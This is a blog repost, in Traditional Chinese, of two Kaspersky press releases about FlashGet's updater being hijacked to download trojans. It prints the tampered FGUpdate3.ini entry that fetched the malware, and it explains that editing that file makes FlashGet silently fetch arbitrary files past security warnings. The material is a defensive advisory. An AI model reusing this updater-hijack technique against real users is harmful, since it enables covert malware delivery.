【奕瑞科技提醒】TrojanGet正侵蝕著全球的網路使用者

 

【台北訊】幾天前我們開始收到從使用者傳來的消息,說道他們的防毒軟體已經察覺木馬病毒出現在 Flashget 資料夾目錄中。

clip_image001

資料分析結果顯示這個問題影響了全球 Flashget 的使用者。這個檔案被命名為inapp4.exe、inapp5.exe、inapp6.exe( 由卡巴斯基防毒軟體偵測出,並且命名為Trojan-DropperWin32.Agent.exe、Dropper.Win32Agent.ezxo和 Trojan-Dowloader.Win32.Agent.kht)出現在使用者被感染的電腦中。

其中最奇怪的地方在於可以被用來入侵這個系統上的木馬程式沒有被偵測出來。一些受到感染的使用者已經完全修補操作系統以及網頁瀏覽器,而惡意程式是如何滲透進他們的電腦的?

首先必須注意的是這隻木馬的所在位置─FlashGet 的資料夾目錄中。仔細地看,除了帶有木馬的檔案之外,其他的皆變成透明,而註有日期的FGUpdate3.ini檔案則已經被新增/更改至最新(與原始檔案不同的地方用藍色標記出來)。

[Add]
fgres1.ini=1.0.0.1035
FlashGet_LOGO.gif=1.0.0.1020
inapp4.exe=1.0.0.1031

[AddEx]
[fgres1.ini]
url=http://dl.flashget.com/flashget/fgres1.cab
flag=16
path=%product%
[FlashGet_LOGO.gif]
url=http://dl.flashget.com/flashget/FlashGet_LOGO.cab
flag=16
path=%product%

[inapp4.exe]
url=http://dl.flashget.com/flashget/appA.cab
flag=2
path=%product%

clip_image002

非常異常的是,連結到 inapp4.exe ( Trojans 的資料夾)引導至 FlashGet 網站,而這個網站就是從 appA.cab.下載下來的木馬程式。

FlashGet 網站並沒有任何與這個事件有關的資訊,但使用者的討論區卻大量地討論這個議題,儘管開發者並沒有對此有任何表示。

根據這個訊息我們設法從網路上去尋找,發現第一波感染事件在2月29日被偵測到。在上一個我們所知道的感染事件發生在3月9日。在這十天裡,完全合法的程式偽裝木馬的下載程式,從開發者的位置進入使用者的電腦安裝並執行木馬!

木馬程式目前已經從這個網址被移除,另外 FGUpdate3.ini (同樣也經由網路下載至使用者電腦的程式)也回到原始的狀態。

FlashGet如何轉變成木馬下載程式?有一個明顯的答案─這個開發者的網站被駭客以及某個人操控,並取代標準結構的檔案夾,引導連結至某個木馬的所在位置。為什麼駭客不使用另一個網頁,或許這是經過深思熟慮的秘密行動,當一個連結至 FlashGet 結構中的資料夾不會喚起猜疑。我們決定去檢查是否它有可能可以使用這個技巧從任何網站下載任何資料夾。這個答案是對的嗎?是的!

你需要的是去增加一個連結(任何可以代表你想要的資料夾)在 FGUpdate3.ini file,接著當你執行 FlashGet 後,每隔一段時間它會自動下載至你的電腦。是否你打上“Refresh”,FlashGet就會利用.ini資料夾中得到的資訊。「弱點」被提出在 FlashGet 1.9xx中的版本中。

所以,儘管這個網站不再被駭,使用者同樣難以防範。任何木馬程式都可以修改這個位置,.ini FlashGet的資料夾,導致它的運作模式和木馬下載程式很相似。它並不值得FlashGet經常將它當成託管應用對待,因此,網路作業活動導致經由申請或請求的網站不會被懷疑,而使用者也不會收到警告。

至今為止,還沒有接到從FlasfGet中國開發者的官方反應,這個事件剩下含糊不清的理由,並沒有保證它不會在度發生。使用者應該感到自由地寫下屬於他們的結局,並衡量他們覺得被竊取的東西。

關於卡巴斯基實驗室:

Kaspersky Lab 卡巴斯基實驗室 (www.kaspersky.com.tw) 研發、生產與銷售內容安全管理解決方案以提供其客戶保護不受資訊科技的威脅。卡巴斯基實驗室提供個人家用以及企業網路的病毒、間諜程式、廣告軟體、木馬、蠕蟲、駭客以及垃圾郵件的防禦。多年以來,卡巴斯基實驗室不斷的面對惡意程式的爭戰並且已經取得各項特別的經驗與知識,使得卡巴斯基實驗室成為業界發展內容安全管理的領導者與專家。今日,卡巴斯基實驗室的產品在全球保護著超過兩億個使用者並且將其技術授權給全球許多業界的資訊安全領導廠商。請拜訪卡巴斯基實驗室網站以取得更多的資訊 www.kaspersky.com.tw

 
新聞稿原文:http://sinwen.com/?p=1627

 

卡巴斯基警告TrojanGet正侵蝕著全球的網路使用者

 

【台北訊】幾天前卡巴斯基實驗室陸續收到從使用者回報,防毒軟體偵測出木馬病毒出現在Flashget資料夾中。

資料分析結果顯示這個問題影響了全球Flashget的使用者。這個檔案被命名為inapp4.exe、inapp5.exe、 inapp6.exe(由卡巴斯基偵測出,並且命名為Trojan-DropperWin32.Agent.exe、 Dropper.Win32Agent.ezxo和 Trojan-Dowloader.Win32.Agent.kht)出現在使用者被感染的電腦中。

FlashGet網站並沒有任何與這個事件有關的資訊,但使用者的討論區卻大量地討論這個議題,儘管開發者並沒有對此有任何表示。

卡巴斯基實驗室分析人員推測,第一波感染事件發生在2月29日。在十多天裡,偽裝合法的程式的木馬,從開發者的位置被下載進入使用者的電腦安裝並執行木馬!

目前木馬程式目前已經從這個網址被移除,另外FGUpdate3.ini(同樣也經由網路下載至使用者電腦的程式)也回到原始的狀態。

卡巴斯基實驗室分析人員表示,顯然這個開發者的網站被駭客以及某個人操控,並取代標準結構的檔案,引導連結至某個木馬的所在位置。比較起以往常見的手法,此事件較為特殊的是,駭客不使用另一個網頁,駭客所利用的手法是增加一個連結在FGUpdate3.ini 檔案,執行FlashGet後,即使使用者並未點擊“Refresh”,FlashGet仍會利用 ini檔案中得到的資訊,每隔一段時間自動下載檔案至使用者的電腦中。這個「弱點」在FlashGet 1.9xx中的版本中就已經被提出。

所以,儘管這個網站不再被駭,使用者同樣難以防範。任何木馬程式都可以透過修改這個本機端的 ini檔案的手法,導致它的運作模式和 Trojan-Downloader 手法相似。而且因為 FlashGet 通常也會被使用者加入到信任的應用程式區域中,導致當有這樣的事件發生時,使用者不會接收到安全防護軟體的警告。

關於卡巴斯基實驗室:

Kaspersky Lab 卡巴斯基實驗室 (www.kaspersky.com.tw) 研發、生產與銷售內容安全管理解決方案以提供其客戶保護不受資訊科技的威脅。卡巴斯基實驗室提供個人家用以及企業網路的病毒、間諜程式、廣告軟體、木馬、蠕蟲、駭客以及垃圾郵件的防禦。多年以來,卡巴斯基實驗室不斷的面對惡意程式的爭戰並且已經取得各項特別的經驗與知識,使得卡巴斯基實驗室成為業界發展內容安全管理的領導者與專家。今日,卡巴斯基實驗室的產品在全球保護著超過兩億個使用者並且將其技術授權給全球許多業界的資訊安全領導廠商。請拜訪卡巴斯基實驗室網站以取得更多的資訊 www.kaspersky.com.tw

新聞稿原文:http://sinwen.com/?p=1630

arrow
arrow
    全站熱搜
    創作者介紹
    創作者 教主濱崎步 的頭像
    教主濱崎步

    教主のふしぎ遊戯

    教主濱崎步 發表在 痞客邦 留言(0) 人氣()